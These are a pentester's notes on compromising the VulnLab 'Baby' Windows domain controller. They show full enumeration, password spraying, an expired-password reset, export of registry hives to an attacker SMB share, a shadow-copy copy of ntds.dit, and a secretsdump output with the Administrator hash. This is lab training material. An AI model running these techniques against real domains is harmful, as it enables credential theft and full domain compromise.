Baby

This is not a writeup, just my notes about VulnLabs machines.

PreviousVulnlabs NextTrusted (Chain)

Last updated 2 months ago

Baby

This is not a writeup, just my notes about VulnLabs machines.

Machine information

Operating System: Windows Server 2022 (Build 20348 x64)

Chain: False (standalone compromise)

Credentials

Username

Password

Method

Scope

Caroline.Robinson

BabyStart123!

LDAP

User description field (Expired Password)

✅ Valid Usernames

jacqueline.barnett
ashley.webb
hugh.george
leonard.dyer
ian.walker
connor.wilkinson
joseph.hughes
kerry.wilson
teresa.bell
caroline.robinson

🔑 Passwords list

BabyStart123!

Enumeration

ICMP Check

ping -c 4 10.10.90.157
PING 10.10.90.157 (10.10.90.157) 56(84) bytes of data.
64 bytes from 10.10.90.157: icmp_seq=1 ttl=127 time=160 ms
64 bytes from 10.10.90.157: icmp_seq=2 ttl=127 time=164 ms
64 bytes from 10.10.90.157: icmp_seq=3 ttl=127 time=159 ms
64 bytes from 10.10.90.157: icmp_seq=4 ttl=127 time=159 ms

--- 10.10.90.157 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3007ms
rtt min/avg/max/mdev = 158.699/160.582/164.422/2.250 ms

Service enumeration

nmap -p- -A --open -T5 -Pn -n -oN ext_baby_tcp_allports -vvv 10.10.90.157
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-04-01 00:34:34Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
3389/tcp  open  ms-wbt-server syn-ack Microsoft Terminal Services
5357/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack Microsoft Windows RPC
49674/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         syn-ack Microsoft Windows RPC
53720/tcp open  msrpc         syn-ack Microsoft Windows RPC
53735/tcp open  msrpc         syn-ack Microsoft Windows RPC

SMB

Null session allowed ✅
SMB Signing: True
SMBv1: Disabled

Initial Foothold

Identifying Leaked Initial Passwords in the User Description Field

❯ nxc ldap 10.10.90.157 -u '' -p '' -M get-desc-users
SMB         10.10.90.157    445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
LDAP        10.10.90.157    389    BABYDC           [+] baby.vl\: 
GET-DESC... 10.10.90.157    389    BABYDC           [+] Found following users: 
GET-DESC... 10.10.90.157    389    BABYDC           User: Guest description: Built-in account for guest access to the computer/domain
GET-DESC... 10.10.90.157    389    BABYDC           User: Teresa.Bell description: Set initial password to BabyStart123!

Initial password for users: BabyStart123!

Running a Password Spraying attack

❯ nxc smb 10.10.90.157 -u users -p 'BabyStart123!'
SMB         10.10.90.157    445    BABYDC           [-] baby.vl\caroline.robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE

Changing the password caroline.robinson's Password

❯ impacket-changepasswd baby.vl/caroline.robinson:'BabyStart123!'@10.10.90.157
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

New password: 
Retype new password: 
[*] Changing the password of baby.vl\caroline.robinson
[*] Connecting to DCE/RPC as baby.vl\caroline.robinson
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.

Compromise Domain Controller

Discovering Caroline.Robinson is member of backup operators group

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> whoami /all

User Info

Username: baby\caroline.robinson
Group Membership: Backup Operators

Privileges

SeBackupPrivilege
SeRestorePrivilege
SeMachineAccountPrivilege

Extracting the Registry Hives using impacket toolkit

impacket-reg caroline.robinson:'password123!'@10.10.75.110 save -keyName 'HKLM\SYSTEM' -o '\\10.8.5.48\smbfolder' 2>/dev/null
impacket-reg caroline.robinson:'password123!'@10.10.75.110 save -keyName 'HKLM\SAM' -o '\\10.8.5.48\smbfolder' 2>/dev/null
impacket-reg caroline.robinson:'password123!'@10.10.75.110 save -keyName 'HKLM\Security' -o '\\10.8.5.48\smbfolder' 2>/dev/null

Dumping ntds.dit using Robocopy

set context persistent nowriters
set metadata c:\\windows\\system32\\spool\\drivers\\color\\example.cab
set verbose on
begin backup
add volume c: alias mydrive

create

expose %mydrive% w:
end backup

C:\temp> robocopy /B W:\Windows\NTDS c:\temp\ntds.dit ntds.dit

Extracting domain credentials

❯ impacket-secretsdump -sam SAM.save  -ntds ntds.dit -system SYSTEM.save local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 41d56bf9b458d01951f592ee4ba00ea6
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee4457ae59f1e3fbd764e33d9cef123d:::
<SNIF>
[*] Cleaning up...